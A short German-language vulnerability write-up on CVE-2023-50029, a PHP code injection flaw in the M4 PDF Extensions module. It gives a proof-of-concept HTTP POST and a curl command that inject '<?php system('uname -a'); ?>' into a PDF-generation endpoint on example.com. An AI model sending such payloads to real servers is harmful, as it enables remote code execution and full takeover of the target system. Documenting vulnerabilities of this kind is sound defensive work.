
CVE-2023-50029: PHP-Injection-Schwachstelle im M4 PDF Extensions Module
CVE-2023-50029 ist eine PHP-Injection-Schwachstelle im M4-PDF-Extensions-Modul. Diese Schwachstelle ermöglicht es Angreifern, beliebigen PHP-Code auf dem Server einzuschleusen und auszuführen, wodurch sie die vollständige Kontrolle über das Zielsystem erlangen können. Das Problem liegt in der unzureichenden Validierung von Eingaben, wodurch schädlicher Code über Benutzerparameter übergeben werden kann.
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"